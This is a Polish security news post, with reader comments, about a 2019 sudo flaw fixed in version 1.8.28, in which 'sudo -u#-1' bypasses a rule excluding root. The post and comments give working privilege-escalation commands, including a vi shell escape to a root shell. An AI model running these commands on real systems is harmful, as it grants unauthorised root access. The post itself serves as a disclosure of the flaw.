Podatność w sudo. W pewnych sytuacjach można dostać roota robiąc sudo -u#-1 lub sudo -u#4294967295

14 października 2019, 21:18 | W biegu | komentarze 4
Tagi: ,
: zin o bezpieczeństwie - pobierz w pdf/epub/mobi.

Szczegóły zostały opisane w tym miejscu. „Pewne sytuacje” dotyczą scenariusza gdy użytkownik może uruchamiać (przez sudo) polecenia z uprawnieniami innych użytkowników, ale z wyłączenie roota, np. w /etc/sudoers mamy wpis:

myhost bob = (ALL, !root) /usr/bin/vi

czyli bob może odpalać vi z uprawnieniami dowolnego użytkownika, ale nie roota. Jednak korzystając z podatności może być i rootem wpisując:

sudo -u#-1 bash
lub
sudo -u#4294967295

Problem załatano niedawno w wersji 1.8.28 sudo.

–ms

 

 

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. Magnus

    Sprawdzone pod Ubuntu 16.04 LTS, sudo w wersji 1.8.16 – nie działa żadna opcja
    Ponownie sprawdzone na CentOS 7, sudo w wersji 1.8.23 – również brak reakcji.

    Odpowiedz
    • Mateusz

      U mnie na Ubuntu 18.04 LTS przed updatem sudo zadziałało jak złoto.

      sudo -u#-1 /usr/bin/vi

      potem:
      :set shell=/bin/bash
      :shell

      i powłoka jako root

      Odpowiedz
  2. Marcin

    Red Hat Enterprise Linux Server release 7.6 (Maipo)

    user1 ALL=(ALL,!root) NOPASSWD: /bin/vi
    [user1@server ~]$ sudo -u#-1 vi
    :!id -u
    0
    Press ENTER or type command to continue

    Dziękuję dobranoc.

    Odpowiedz
  3. Tomasz21

    Starszy model, starsza dystrybucja lepsza; skąd my to znamy?
    Że to co stare jest dużo lepsze?
    Pozdr.

    Odpowiedz

Odpowiedz